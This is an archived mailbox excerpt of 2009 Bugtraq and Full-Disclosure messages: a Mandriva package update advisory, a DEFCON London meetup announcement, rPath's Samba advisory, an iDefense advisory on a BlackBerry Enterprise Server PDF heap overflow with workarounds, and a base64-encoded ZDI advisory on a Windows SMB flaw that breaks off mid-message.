 0577e95736fda7aa1e24239644a7ee24  2008.1/x86_64/openoffice.org64-l10n-sl-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 457f5055696460e144cef83797717b2e  2008.1/x86_64/openoffice.org64-l10n-sv-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 97344d7b55b00175487395d2150a1abd  2008.1/x86_64/openoffice.org64-l10n-ta-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 1c26b869a3631fbe54149cb0fd1da7e4  2008.1/x86_64/openoffice.org64-l10n-tr-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 1b2764049d7f0f871ef59f8bc59a0d7c  2008.1/x86_64/openoffice.org64-l10n-zh_CN-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 24c984ce888562b3ca14397374b4cc29  2008.1/x86_64/openoffice.org64-l10n-zh_TW-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 c2ce6108f7c493088bf7c1d8a580768a  2008.1/x86_64/openoffice.org64-l10n-zu-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 db231aa9f280e4492cc893f47752a591  2008.1/x86_64/openoffice.org64-math-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 6355858d279a9f7dea46b5bfbcc2aca0  2008.1/x86_64/openoffice.org64-mono-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 fe1f98364dd30a1414f81344db9cd9a3  2008.1/x86_64/openoffice.org64-openclipart-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 e003862fa11281610b3da5b10d783d81  2008.1/x86_64/openoffice.org64-pyuno-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 68bf8636f6e3d488a1a6148fe7e6029b  2008.1/x86_64/openoffice.org64-style-andromeda-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 00b1759dcfb0bfbb96a5bd38272ff9e4  2008.1/x86_64/openoffice.org64-style-crystal-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 6c724536050b19d64bdecfeb01585b2d  2008.1/x86_64/openoffice.org64-style-hicontrast-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 deec1adf124f70305c47c915d618c91e  2008.1/x86_64/openoffice.org64-style-industrial-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 08aa4951c4227af0df9425b92e13da2d  2008.1/x86_64/openoffice.org64-style-tango-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 ab282131dfb9061feff287c8e2d662ac  2008.1/x86_64/openoffice.org64-testtool-2.4.1.10-1.2mdv2008.1.x86_64.rpm
 a92bc374dcc2158d63d18afcc7009c05  2008.1/x86_64/openoffice.org64-writer-2.4.1.10-1.2mdv2008.1.x86_64.rpm 
 b13fae74b49bcdf0c9f1228ee2ad8244  2008.1/SRPMS/openoffice.org-2.4.1.10-1.2mdv2008.1.src.rpm
 d71b49c8df8e4a44f3ba4604065a5e4d  2008.1/SRPMS/openoffice.org64-2.4.1.10-1.2mdv2008.1.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJbJksmqjQ0CJFipgRAggCAKDhN89MtydfmMlnZ+SlJsKdRAwg3gCgunuq
jjNUFFroATEp1QCR5Dp9Kyo=kjL9
-----END PGP SIGNATURE-----

From - Tue Jan 13 13:42:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058ac
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39147-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 623ADEC12E
for <lists@securityspace.com>; Tue, 13 Jan 2009 13:32:33 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id E3D96236F43; Tue, 13 Jan 2009 11:16:08 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 6261 invoked from network); 13 Jan 2009 17:58:24 -0000
X-Authentication-Warning: smtp0.thebunker.net: Host 78-105-4-70.zone3.bethere.co.uk [78.105.4.70] claimed to be [10.241.6.194]
Message-ID: <496CDBBD.801@pirate-radio.org>
Date: Tue, 13 Jan 2009 18:21:49 +0000
From: Major Malfunction <majormal@pirate-radio.org>
User-Agent: Thunderbird 2.0.0.18 (X11/20081125)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk,
dc4420@dc4420.org
Subject: ANNOUNCE: DEFCON London - DC4420 - January meet - Thursday 15th Jan
 2009
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: ClamAV 0.94.2/8861/Tue Jan 13 16:09:19 2009 on livid.thebunker.net
X-Virus-Status: Clean
X-Spam-Status: No, score=0.5 required=5.0 tests=AWL,BAYES_20,RDNS_DYNAMIC,
SPF_NEUTRAL,URI_HEX autolearn=no version=3.2.5
X-Spam-Checker-Version: SpamAssassin 3.2.5 (2008-06-10) on livid.thebunker.net
Status:   

hi all!

here is an announcement, shamelessly cut & pasted from the website (i.e. 
alien wrote it really :)

Thursday 15th January.

Happy seasonal greetings and stuff.

The new year rolls in, the Govt 'crazy ideas' talking starts again - 
however here - sanity reigns and thus we bring you:

"Trampoliner - Automatically choosing return addresses for buffer 
overflow attacks" - Tom Keetch

"MUFFIN recipe: How to find software vulnerabilities on Microsoft OS"
"demo of firewire data leakage" - Guillaume Vissian

"Architecture Analysis." - Orac

"failed allocations, more interesting than pie" - xz

All welcome, and if it's your first time you will be talking. Make it a 
new year resolution to talk to someone you don't know at this meeting!

mailing list - login and look at the projects forum for details. the 
list will only accept posts from subscriber addresses! so if you send 
something and it doesn't appear, that's why...

Where?

Upstairs @ Glassblower 
http://maps.google.com/maps?f=q&hl=en&geocode=&q=W1B+5DL&ie=UTF8&llQ.510625,-0.136878&spn=0.00629,0.021415&z&iwloc�dr
42 Glasshouse St, Piccadilly, W1B 5JY

doors open from 7, speaking starts from 7.30 - please try and be prompt 
as some people need to go early to get trains back out of London.

we have private use of the whole of the upstairs till 11.30.

real ale on draught : Adnams Broadside + Spitfire, 'Buccomb' and 
'Doombar'. other stuff on draught : Guinness, Staropramen, Hoegaarden, 
Leffe. even more stuff on draught : Becks, Fosters, 1664

food menu is extensive and most importantly : they do Pie - but they 
stop serving at 9pm!

comment/participate at http://dc4420.org/

see you there!!!

cheers,
MM
-- 
"In DEFCON, we have no names..." errr... well, we do... but silly ones...

From - Tue Jan 13 14:42:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058ad
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39150-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id E183AEC17A
for <lists@securityspace.com>; Tue, 13 Jan 2009 14:38:44 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 6B2261437BC; Tue, 13 Jan 2009 12:33:57 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 7897 invoked from network); 13 Jan 2009 18:56:21 -0000
X-Authentication-Warning: logo.rdu.rpath.com: elliot set sender to rPath Update Announcements <announce-noreply@rpath.com> using -r
Date: Tue, 13 Jan 2009 14:13:30 -0500
From: rPath Update Announcements <announce-noreply@rpath.com>
To: product-announce@lists.rpath.com,
product-announce@lists.rpath.com, security-announce@lists.rpath.com,
update-announce@lists.rpath.com, security-announce@lists.rpath.com,
update-announce@lists.rpath.com
Cc: full-disclosure@lists.grok.org.uk, vulnwatch@vulnwatch.org,
bugtraq@securityfocus.com, lwn@lwn.net,
full-disclosure@lists.grok.org.uk, vulnwatch@vulnwatch.org,
bugtraq@securityfocus.com, lwn@lwn.net
Subject: rPSA-2009-0006-1 samba samba-client samba-server samba-swat
Message-ID: <496ce7da.vtXGoebDMyNRARjA%announce-noreply@rpath.com>
User-Agent: nail 11.22 3/20/05
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Status:   

rPath Security Advisory: 2009-0006-1
Published: 2009-01-13
Products:
    rPath Appliance Platform Linux Service 1
    rPath Appliance Platform Linux Service 2
    rPath Linux 1
    rPath Linux 2

Rating: Minor
Exposure Level Classification:
    Remote Non-deterministic Denial of Service
Updated Versions:
    samba=conary.rpath.com@rpl:1/3.0.33-0.1-2
    samba=conary.rpath.com@rpl:2/3.0.33-1.1-1
    samba-client=conary.rpath.com@rpl:1/3.0.33-0.1-2
    samba-client=conary.rpath.com@rpl:2/3.0.33-1.1-1
    samba-client=rap.rpath.com@rpath:linux-1/3.0.33-1-1
    samba-client=rap.rpath.com@rpath:linux-2/3.0.33-1-1
    samba-server=conary.rpath.com@rpl:1/3.0.33-0.1-2
    samba-server=conary.rpath.com@rpl:2/3.0.33-1.1-1
    samba-swat=conary.rpath.com@rpl:1/3.0.33-0.1-2
    samba-swat=conary.rpath.com@rpl:2/3.0.33-1.1-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2928

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=cvename.cgi?name=CVE-2008-4314

Description:
    In previous versions of the samba package, it may be possible for
    unauthenticated remote attackers to cause a denial of service in
    the smbd daemon, or to access the contents of some of the memory
    of the smbd daemon.  It is not known whether either of these
    vulnerabilities can be exploited in practice; this update fixes
    the bugs which may create these vulnerabilities.

http://wiki.rpath.com/Advisories:rPSA-2009-0006

Copyright 2009 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

From - Tue Jan 13 15:22:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058ae
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39151-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id C3AC1EC177
for <lists@securityspace.com>; Tue, 13 Jan 2009 15:15:11 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id CE28D236FF8; Tue, 13 Jan 2009 12:58:35 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 9446 invoked from network); 13 Jan 2009 19:32:02 -0000
Message-ID: <496CF12D.4080308@idefense.com>
Date: Tue, 13 Jan 2009 14:53:17 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 01.13.09: RIM BlackBerry Enterprise Server
 Attachment Service PDF Distiller 'symWidths' Heap Overflow Vulnerability
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 01.12.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 12, 2009

I. BACKGROUND

The BlackBerry Enterprise Server is a suite of applications used to
connect enterprise email and messaging services to BlackBerry device
users. It consists of a variety of applications, one of which is the
Attachment Service. This application is used to convert email
attachments into a format that is easily rendered on BlackBerry
devices. When a user requests an attachment on their BlackBerry device,
the Attachment Service will obtain the attachment, parse and convert it,
and then send it to the user for viewing. The Attachment Service is
capable of converting a variety of different file formats, including
PDF files. This vulnerability affects the PDF filter/distiller. For
more information, see the vendor's site found at the following link.

http://na.blackberry.com/eng/services/server/

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in Research In
Motion Ltd. (RIM)'s BlackBerry Enterprise Server could allow an
attacker to execute arbitrary code with the privileges of the affected
service, usually SYSTEM.

The vulnerability occurs when parsing a certain stream inside of a PDF
file. During parsing, a heap buffer is filled up with without properly
checking to see whether the buffer is large enough to hold the current
value. By inserting a large number of values, it is possible to
overflow the buffer, and corrupt object pointers. This can lead to
pointers being controlled, which results in the execution of arbitrary
code.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the Attachment Service, usually SYSTEM. In
order to exploit this vulnerability, an attacker must email an
enterprise BlackBerry user a malicious PDF file. Then, the user must
attempt to view the file on their device. It is important to note that
a user must request the attachment in order to trigger the parsing. It
is not possible to exploit this vulnerability in a completely automated
fashion without a user asking to view the file. However, after a user
has requested the attachment, no further interaction is necessary.

Exploitation of heap overflow vulnerabilities on modern operating
systems can be difficult due to heap integrity checks. However, the
code in the PDF Distiller offers a wide variety of application specific
targets for overwriting. By sculpting the heap it is possible place
pointers in the buffer and use these to gain arbitrary code execution.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in BlackBerry
Enterprise Server version 4.1.5 and 4.1.6 (4.1 SP5, SP6). 4.1.6 is the
most current version, as of the publishing of this report. This
vulnerability was confirmed in BlackBerry Enterprise Server for
Microsoft Exchange, but is believed to affect the Lotus and Novell
versions as well. Previous versions may also be affected.

V. WORKAROUND

It is possible to disable the PDF Distiller, which will prevent the
conversion of PDF files by the Attachment Server. The following
workaround was suggested by RIM for a previous PDF Distiller
vulnerability, and has been verified to prevent the vulnerability
described in this report. This workaround can be accomplished as
follows:

To remove the PDF file extension from the list of supported file format
extensions, complete the following actions:

   1. From the Windows Desktop, open the BlackBerry Server Configuration
tool.
   2. Click the Attachment Server tab.
   3. In the Format Extensions field, delete pdf: from the colon
delimited list of extensions.
   4. Click Apply.
   5. Click OK.

After this, it is also necessary to completely disable the PDF distiller
from loading, which will prevent an attacker from renaming a PDF to some
other format extension. In order to do this, complete the following
steps:

   1. On the Windows Desktop, open the BlackBerry Server Configuration tool.
   2. Click the Attachment Server tab.
   3. In the Configuration Option drop-down list, select Attachment Server.
   4. In the Distiller Settings section, next to the distiller name
Adobe PDF, clear the check box in the Enabled column.
   5. Click Apply.
   6. Click OK.
   7. On the Windows Desktop, in Administrative Tools, open Services.
   8. Right-click BlackBerry Attachment Service and click Stop.
   9. Right-click BlackBerry Attachment Service and click Start.
  10. Close Services.

In Microsoft Exchange and Novell GroupWise environments, complete the
following additional steps:

   1. On the Windows Desktop, in Administrative Tools, open Services.
   2. Right-click BlackBerry Dispatcher and click Stop.
   3. Right-click BlackBerry Dispatcher and click Start.
   4. Close Services.

In IBM Lotus Domino environments, complete the following additional
steps:

   1. Open the IBM Lotus Domino Administrator.
   2. Click the Server tab.
   3. Click the Status tab.
   4. Click Server Console.
   5. In the Domino Command field, type tell BES quit and press ENTER.
   6. In the Domino Command field, type load BES and press ENTER.
   7. Close the IBM Lotus Domino Administrator.

VI. VENDOR RESPONSE

RIM has released a patch which addresses this issue. For more
information, consult their advisories at the following URLs:

http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB17118

http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB17119

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

12/17/2008  Initial Vendor Notification
12/17/2008  Initial Vendor Reply
12/17/2008  PoC Code Provided To Vendor
12/17/2008  Request Additional Information
01/06/2009  Additional Vendor Feedback
01/12/2009  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was discovered by Sean Larsson, iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright � 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJbPEtbjs6HoxIfBkRArA9AKC+HHRI4yTyX1qfKI3Risx2rBLebQCgov2e
h0GBEHCHYZuz6nAR3JE3DEA=0wb6
-----END PGP SIGNATURE-----

From - Tue Jan 13 15:32:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058af
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39152-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 65EB2EC180
for <lists@securityspace.com>; Tue, 13 Jan 2009 15:24:38 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 5927E2370C7; Tue, 13 Jan 2009 12:59:10 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 9632 invoked from network); 13 Jan 2009 19:40:33 -0000
X-EDSINT-Source-Ip: 205.142.126.149
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-09-001: Microsoft SMB NT Trans Request Parsing Remote Code Execution
 Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OF5236BF80.C66B88FC-ON8525753D.006E111F-8625753D.006E387C@3com.com>
From: zdi-disclosures@3com.com
Date: Tue, 13 Jan 2009 14:03:55 -0600
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 01/13/2009 12:03:59 PM,
Serialize complete at 01/13/2009 12:03:59 PM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   

WkRJLTA5LTAwMTogTWljcm9zb2Z0IFNNQiBOVCBUcmFucyBSZXF1ZXN0IFBhcnNpbmcgUmVtb3Rl
IENvZGUgRXhlY3V0aW9uIA0KVnVsbmVyYWJpbGl0eQ0KaHR0cDovL3d3dy56ZXJvZGF5aW5pdGlh
dGl2ZS5jb20vYWR2aXNvcmllcy9aREktMDktMDAxDQpKYW51YXJ5IDEzLCAyMDA5DQoNCi0tIENW
RSBJRDoNCkNWRS0yMDA4LTQ4MzQNCg0KLS0gQWZmZWN0ZWQgVmVuZG9yczoNCk1pY3Jvc29mdA0K
DQotLSBBZmZlY3RlZCBQcm9kdWN0czoNCk1pY3Jvc29mdCBXaW5kb3dzIFhQDQpNaWNyb3NvZnQg
V2luZG93cyAyMDAwIFNQNA0KTWljcm9zb2Z0IFdpbmRvd3MgU2VydmVyIDIwMDMNCk1pY3Jvc29m
dCBXaW5kb3dzIFZpc3RhDQpNaWNyb3NvZnQgV2luZG93cyBTZXJ2ZXIgMjAwOA0KDQotLSBUaXBw
aW5nUG9pbnQoVE0pIElQUyBDdXN0b21lciBQcm90ZWN0aW9uOg0KVGlwcGluZ1BvaW50IElQUyBj
dXN0b21lcnMgaGF2ZSBiZWVuIHByb3RlY3RlZCBhZ2FpbnN0IHRoaXMNCnZ1bG5lcmFiaWxpdHkg
YnkgRGlnaXRhbCBWYWNjaW5lIHByb3RlY3Rpb24gZmlsdGVyIElEIDY2NjIuIA0KRm9yIGZ1cnRo
ZXIgcHJvZHVjdCBpbmZvcm1hdGlvbiBvbiB0aGUgVGlwcGluZ1BvaW50IElQUywgdmlzaXQ6DQoN
CiAgICBodHRwOi8vd3d3LnRpcHBpbmdwb2ludC5jb20NCg0KLS0gVnVsbmVyYWJpbGl0eSBEZXRh
aWxzOg0KVGhpcyB2dWxuZXJhYmlsaXR5IGFsbG93cyByZW1vdGUgYXR0YWNrZXJzIHRvIHRyaWdn
ZXIgYSBkZW5pYWwgb2YNCnNlcnZpY2UgY29uZGl0aW9uIG9uIHZ1bG5lcmFibGUgaW5zdGFsbGF0
aW9ucyBvZiBNaWNyb3NvZnQgV2luZG93czsNCnJlbW90ZSBjb2RlIGV4ZWN1dGlvbiBpcyBhbHNv
IHRoZW9yZXRpY2FsbHkgcG9zc2libGUuIFVzZXIgaW50ZXJhY3Rpb24NCmlzIG5vdCByZXF1aXJl
ZCB0byBleHBsb2l0IHRoaXMgdnVsbmVyYWJpbGl0eS4NCg0KVGhlIHNwZWNpZmljIGZsYXcgZXhp
c3RzIGluIHRoZSBwcm9jZXNzaW5nIG9mIFNNQiByZXF1ZXN0cy4gQnkNCnNwZWNpZnlpbmcgbWFs
Zm9ybWVkIHZhbHVlcyBkdXJpbmcgYW4gTlQgVHJhbnMgcmVxdWVzdCBhbiBhdHRhY2tlciBjYW4N
CmNhdXNlIHRoZSB0YXJnZXQgc3lzdGVtIHRvIGtlcm5lbCBwYW5pYyB0aGVyZWJ5IHJlcXVpcmlu
ZyBhIHJlYm9vdCBvZg0KdGhlIHN5c3RlbS4gRnVydGhlciBtYW5pcHVsYXRpb24gY2FuIHRoZW9y
ZXRpY2FsbHkgcmVzdWx0IGluIHJlbW90ZQ0KdW5hdXRoZW50aWNhdGVkIGNvZGUgZXhlY3V0aW9u
Lg0KDQotLSBWZW5kb3IgUmVzcG9uc2U6DQpNaWNyb3NvZnQgaGFzIGlzc3VlZCBhbiB1cGRhdGUg
dG8gY29ycmVjdCB0aGlzIHZ1bG5lcmFiaWxpdHkuIE1vcmUNCmRldGFpbHMgY2FuIGJlIGZvdW5k
IGF0Og0KDQpodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vdGVjaG5ldC9zZWN1cml0eS9idWxsZXRp
bi9tczA5LTAwMS5tc3B4DQoNCi0tIERpc2Nsb3N1cmUgVGltZWxpbmU6DQoyMDA4LTA2LTI1IC0g
VnVsbmVyYWJpbGl0eSByZXBvcnRlZCB0byB2ZW5kb3INCjIwMDktMDEtMTMgLSBDb29yZGluYXRl
ZCBwdWJsaWMgcmVsZWFzZSBvZiBhZHZpc29yeQ0KDQotLSBDcmVkaXQ6DQpUaGlzIHZ1bG5lcmFi
aWxpdHkgd2FzIGRpc2NvdmVyZWQgYnk6DQogICAgKiBBbm9ueW1vdXMNCg0KLS0gQWJvdXQgdGhl
IFplcm8gRGF5IEluaXRpYXRpdmUgKFpESSk6DQpFc3RhYmxpc2hlZCBieSBUaXBwaW5nUG9pbnQs
IFRoZSBaZXJvIERheSBJbml0aWF0aXZlIChaREkpIHJlcHJlc2VudHMgDQphIGJlc3Qtb2YtYnJl
ZWQgbW9kZWwgZm9yIHJld2FyZGluZyBzZWN1cml0eSByZXNlYXJjaGVycyBmb3IgcmVzcG9uc2li
bHkNCmRpc2Nsb3NpbmcgZGlzY292ZXJlZCB2dWxuZXJhYmlsaXRpZXMuDQoNClJlc2VhcmNoZXJz
IGludGVyZXN0ZWQgaW4gZ2V0dGluZyBwYWlkIGZvciB0aGVpciBzZWN1cml0eSByZXNlYXJjaA0K
dGhyb3VnaCB0aGUgWkRJIGNhbiBmaW5kIG1vcmUgaW5mb3JtYXRpb24gYW5kIHNpZ24tdXAgYXQ6
DQoNCiAgICBodHRwOi8vd3d3Lnplcm9kYXlpbml0aWF0aXZlLmNvbQ0KDQpUaGUgWkRJIGlzIHVu
aXF1ZSBpbiBob3cgdGhlIGFjcXVpcmVkIHZ1bG5lcmFiaWxpdHkgaW5mb3JtYXRpb24gaXMNCnVz
ZWQuIFRpcHBpbmdQb2ludCBkb2VzIG5vdCByZS1zZWxsIHRoZSB2dWxuZXJhYmlsaXR5IGRldGFp
bHMgb3IgYW55DQpleHBsb2l0IGNvZGUuIEluc3RlYWQsIHVwb24gbm90aWZ5aW5nIHRoZSBhZmZl
Y3RlZCBwcm9kdWN0IHZlbmRvciwNClRpcHBpbmdQb2ludCBwcm92aWRlcyBpdHMgY3VzdG9tZXJz
IHdpdGggemVybyBkYXkgcHJvdGVjdGlvbiB0aHJvdWdoDQppdHMgaW50cnVzaW9uIHByZXZlbnRp
b24gdGVjaG5vbG9neS4gRXhwbGljaXQgZGV0YWlscyByZWdhcmRpbmcgdGhlDQpzcGVjaWZpY3Mg
b2YgdGhlIHZ1bG5lcmFiaWxpdHkgYXJlIG5vdCBleHBvc2VkIHRvIGFueSBwYXJ0aWVzIHVudGls
DQphbiBvZmZpY2lhbCB2ZW5kb3IgcGF0Y2ggaXMgcHVibGljbHkgYXZhaWxhYmxlLiBGdXJ0aGVy
bW9yZSwgd2l0aCB0aGUNCmFsdHJ1aXN0aWMgYWltIG9mIGhlbHBpbmcgdG8gc2VjdXJlIGEgYnJv
YWRlciB1c2VyIGJhc2UsIFRpcHBpbmdQb2ludA0KcHJvdmlkZXMgdGhpcyB2dWxuZXJhYmlsaXR5
IGluZm9ybWF0aW9uIGNvbmZpZGVudGlhbGx5IHRvIHNlY3VyaXR5DQp2ZW5kb3JzIChpbmNsdWRp
bmcgY29tcGV0aXRvcnMpIHdobyBoYXZlIGEgdnVsbmVyYWJpbGl0eSBwcm90ZWN0aW9uIG9yDQpt
aXRpZ2F0aW9uIHByb2R1Y3QuDQoNCk91ciB2dWxuZXJhYmlsaXR5IGRpc2Nsb3N1cmUgcG9saWN5
IGlzIGF2YWlsYWJsZSBvbmxpbmUgYXQ6DQoNCiAgICBodHRwOi8vd3d3Lnplcm9kYXlpbml0aWF0
aXZlLmNvbS9hZHZpc29yaWVzL2Rpc2Nsb3N1cmVfcG9saWN5Lw0KDQpDT05GSURFTlRJQUxJVFkg
Tk9USUNFOiBUaGlzIGUtbWFpbCBtZXNzYWdlLCBpbmNsdWRpbmcgYW55IGF0dGFjaG1lbnRzLA0K
aXMgYmVpbmcgc2VudCBieSAzQ29tIGZvciB0aGUgc29sZSB1c2Ugb2YgdGhlIGludGVuZGVkIHJl
Y2lwaWVudChzKSBhbmQNCm1heSBjb250YWluIGNvbmZpZGVudGlhbCwgcHJvcHJpZXRhcnkgYW5k
L29yIHByaXZpbGVnZWQgaW5mb3JtYXRpb24uDQpBbnkgdW5hdXRob3JpemVkIHJldmlldywgdXNl
LCBkaXNjbG9zdXJlIGFuZC9vciBkaXN0cmlidXRpb24gYnkgYW55IA0KcmVjaXBpZW50IGlzIHBy
b2hpYml0ZWQuICBJZiB5b3UgYXJlIG5vdCB0aGUgaW50ZW5kZWQgcmVjaXBpZW50LCBwbGVhc2UN
CmRlbGV0ZSBhbmQvb3IgZGVzdHJveSBhbGwgY29waWVzIG9mIHRoaXMgbWVzc2FnZSByZWdhcmRs
ZXNzIG9mIGZvcm0gYW5kDQphbnkgaW5jbHVkZWQgYXR0YWNobWVudHMgYW5kIG5vdGlmeSAzQ29t
IGltbWVkaWF0ZWx5IGJ5IGNvbnRhY3RpbmcgdGhlDQpzZW5kZXIgdmlhIHJlcGx5IGUtbWFpbCBv
